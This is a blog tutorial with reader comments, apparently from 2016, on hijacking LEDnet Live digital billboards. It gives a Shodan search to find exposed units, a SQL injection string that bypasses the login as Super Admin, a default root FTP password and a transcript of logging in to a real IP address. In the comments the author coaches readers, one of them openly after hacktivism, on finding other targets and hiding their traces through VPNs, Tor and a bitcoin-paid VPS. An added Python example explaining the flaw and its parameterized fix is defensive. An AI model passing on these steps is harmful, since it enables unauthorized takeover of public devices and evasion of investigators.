Hacking Digital Billboards

About a month ago, a member of Hack Forums called Gangs posted a tutorial on how to hack digital billboards with a simple SQL injection. I thought it can’t be that simple and tested it out myself. To my surprise, even in 2016 SQL injection is still a valid attack vector on sites connected to the internet; I’m guessing that’s why it’s still in the OWASP (Open Web Application Security Project) Top 10.

Click this link to go to the original post at Hack Forums: http://hackforums.net/showthread.php?tid=5277277

First of all, you need to find some vulnerable billboards connected to the internet. To do this you need to create a free account at https://www.shodan.io/

Shodan is a search engine that lets the user find specific types of computers (Web Cams, routers, servers, etc.) connected to the internet using a variety of filters.

Once you’re registered at Shodan, you can use the search feature to find our vulnerable billboards.

In the search box, type title:"lednet live system" as pictured below.

[Image: Shodan LED live system search]

and you should be presented with a list of results like this one in Egypt.

[Image: LED live site]

When you click the link in Shodan it should take you directly to the site hosting the billboard system and you will be presented with a login.

So how to hack it? Well the Username Parameter is vulnerable to SQL Injection…

So to Login, paste in the username parameter…

-1558" OR 9005=9005 AND "UxGI"="UxGI

and anything in the password input. Now click login!

[Image: LED live SQLi]

Once logged in, take a look at the top right corner: you should now be logged in as a Super Admin.

[Image: LED live Super Admin]

From here you have full access to the digital billboard and can control everything, from what shows on it to changing all the display and power settings, even enabling the built-in Wi-Fi and giving everyone free Wi-Fi.
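Why the username value above logs in without a password, and what the fix looks like, as an added example that is not from the original post or the vendor's code. The query shape (input concatenated into the SQL text, username compared last), the two-user table and the function names are assumptions, since the page does not show the backend.

```python
import hashlib
import hmac
import sqlite3

# The username value quoted in the article above.
PAGE_INPUT = '-1558" OR 9005=9005 AND "UxGI"="UxGI'

def _kdf(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed two-user table; not the product's real schema."""
    db = sqlite3.connect(":memory:")
    # MySQL reads "..." as a string by default; ask SQLite to do the same
    # where the switch exists (Python 3.12+), else rely on its legacy default.
    op = getattr(sqlite3, "SQLITE_DBCONFIG_DQS_DML", None)
    if op is not None and hasattr(db, "setconfig"):
        db.setconfig(op, True)
    db.execute("CREATE TABLE users (username TEXT, role TEXT,"
               " password TEXT, salt BLOB, pw_hash BLOB)")
    for name, role, pw in [("admin", "Super Admin", "s3cret-A"),
                           ("operator", "Operator", "s3cret-B")]:
        salt = name.encode() * 4  # fixed for a repeatable demo; use os.urandom(16)
        db.execute("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                   (name, role, pw, salt, _kdf(pw, salt)))
    return db

def login_vulnerable(db, username, password):
    # ASSUMED query shape: input concatenated into the SQL text, username last.
    # AND binds tighter than OR, so the injected OR branch is true for every row.
    sql = ('SELECT role FROM users WHERE password = "' + password +
           '" AND username = "' + username + '"')
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_hardened(db, username, password):
    # Bound parameter: the input is only ever compared as data, never parsed.
    row = db.execute("SELECT role, salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return None
    role, salt, pw_hash = row
    # Password checked in the application against a salted hash.
    return role if hmac.compare_digest(_kdf(password, salt), pw_hash) else None

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", login_vulnerable(db, PAGE_INPUT, "anything"))
    print("parameterized:", login_hardened(db, PAGE_INPUT, "anything"))
```

The concatenated query returns the first row of the table, which is why the article's login lands on the highest-privilege account; the parameterized lookup finds no user with that literal name.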

But wait that’s not all!!!!

There is another vulnerability in these billboards, which is a default root password vulnerability. You can basically get root FTP access to all of these billboards with the details below….

Username: root
Password: 111111
$ ftp 186.206.188.175
 Connected to 186.206.188.175.
 220 Welcome to blah FTP service.
 Name (186.206.188.175): root
 331 Please specify the password.
 Password:
 230 Login successful.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp> cd /
 250 Directory successfully changed.
 ftp> passive
 Passive mode on.
 ftp> ls
 229 Entering Extended Passive Mode (|||41314|).
 150 Here comes the directory listing.
 drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
 drwxr-xr-x 7 0 0 0 May 21 18:08 dev
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
 drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
 drwxr-xr-x 1 0 0 36 Jan 01 1970 home
 drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
 lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
 drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
 drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
 dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
 drwxr-xr-x 1 0 0 116 Jan 01 1970 root
 drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
 drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
 drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
 drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
 drwxr-xr-x 3 0 0 672 Jan 01 1970 var
 drwxr-xr-x 4 0 0 288 Jan 01 1970 www
 226 Directory send OK.
 ftp>

You now have root access to the entire server.

I do think it’s a poor show on the part of the company that makes and sells this product not to have done proper security testing before going to market, which would have picked up a simple SQL injection and even a default root password on all your devices, tut tut… but I bet there are different types of billboards with the same sort of issues.

Hemp

IT and security Expert with 20+ Years of Experience.

With over two decades of experience in the dynamic field of Information Technology and security, I have honed my skills to become a leading expert in safeguarding digital landscapes. My passion for technology and an unquenchable thirst for knowledge have driven me to stay at the forefront of the ever-evolving IT industry.

19 thoughts on “Hacking Digital Billboards”

  1. Good evening! I have a problem with login and password. When I try to log in, the site creates the same window and I can’t change anything there. Can somebody help me?!

    1. Hi WinTor228 thanks for your comment, I have just had a quick look at this myself and can’t see any vulnerable systems still showing up in Shodan anymore. This vulnerability has probably been patched by now as this post was from back in 2016.

      Hemp

  2. Hey hemp,
    title:”lednet live system” is now showing “No results found”. My best guess is the problem has been rectified perhaps.

    Still it would be really cool if it could be done again and will be much appreciated if you could do some post on that again if possible.

    I want to try it at least once in a lifetime 😊😁

    Thanks.
    Budding Youth.

    1. Hi Budding Youth Thanks for your comment.

      This was just a simple SQL injection; you can find plenty of them using Google dorks to all sorts of web portals.

      Check out my tutorial on SQL Injection Basics. This should give you all the information you need to get started with SQL injection.

      Hemp.

      1. Hi, I just tested this method and it works. Copy/paste does not work but typing will return the desired results. My guess is the double quotation font/style.

        1. Hi Reader

          Thanks for taking the time and letting me know. I thought some of the problems were actually finding the servers in Shodan.

          I’ll take a look myself tonight; if it is something in the blog post, hopefully I can resolve it.

          Hemp

  3. Suh, Hemp.
    Is there another way to hack billboards? Since my city doesn’t have any lednet live billboards, or at least I didn’t find any while searching on Shodan, 2 American ones and 1 Russian one. I would LOVE to find one located in Riyadh, Saudi Arabia.

    Much thanks, learnin’ hacker

    1. Hi demtions

      Thanks for your comment, You are the first person to post a comment on my newly created Security Tutorials.

      As you stated the method above only works for Lednet live billboards and I am pretty sure has now been patched…

      But there are plenty of ways to hack other Digital Billboards. If you are still learning though, try and get your head around the basics first. In this case it was a simple SQL injection and default creds that allowed us to access the ftp taking control of the billboard.

      I would say start by taking a look at my tutorial on setting up a vulnerable LAMP server

      Then go through my SQL injection basics tutorial to understand why and how this attack worked.

      After you have the basics, you need to understand what you are trying to hack: what type of device is it, how is it managed (you would like to think their management would be locked down to a specific IP, but they are not always).

      I have even read that some of these billboards are managed by a PC in the billboard itself, but you will need to find this out.

      If you were feeling practically brazen you could contact the manufacturer to get any technical information.

      Leave me another comment if you want any more information or help.

      Hemp

  4. Hey there,
    I managed to do everything so far but when I hit play on the monitor menu I keep getting
    “Send IPC
    Error”
    I don’t really know what that means and I’ve been looking left and right for answers.

    Can you help me?
    Much appreciated

    1. Hi Cat

      I am not sure myself of the working ins and outs of the LEDnet LIVE system; I am actually surprised you found one, as I thought they had all been patched.

      Good luck,

      Hemp

  5. Hey Hemp,
    I’m interested in Hacktivism and I’ve used Shodan before to look for vulnerable devices. Since you connected to this billboard, what steps did you take to conceal your presence/remove traces?

    1. Hi Mike

      Thanks for your comment.

      This is an interesting topic and is a good idea for a future tutorial.

      To be honest, there is no real way to be 100% anonymous online; if you do something bad enough you will be tracked down.

      >You could get yourself a VPN, “one that says they do not keep logs”, and run TOR over it. However, your ISP will still be able to see you connecting on the VPN, and what do you think the VPN company will give up about you when they get raided by the police?

      >You could also try and use a public WiFi, but even then with all the CCTV everywhere, if you do something bad enough they will still find you.

      > My personal preference is to purchase a Linux VPS in bitcoin or with a prepaid credit card which you paid for in cash, preferably in a country like Russia. You can then SSH into it and do all your hacking from that; however, even this is traceable: CCTV in the shop where the pre-paid card is purchased, ISP logs of you connecting to the VPS.

      If you google how hackers have got caught, you will see there is always something stupid like metadata that catches them out in the end. Just think how much resource a police force or government agency has at its disposal, tracking you down if they needed.

      The only real way to stay 100% on the right side of the law is to only hack what you have consent to hack.

      Stay Safe Mike don’t do anything stupid!!

      Hemp 🙂

  6. This is very interesting, but will I get arrested for it? I think it’s kool but I’m not interested in getting raided by the feds. Thanks 🙂

    1. Good question… Well, it’s only illegal if you get caught, right … but on a serious note, you should only attempt to hack something you own or have permission to hack.
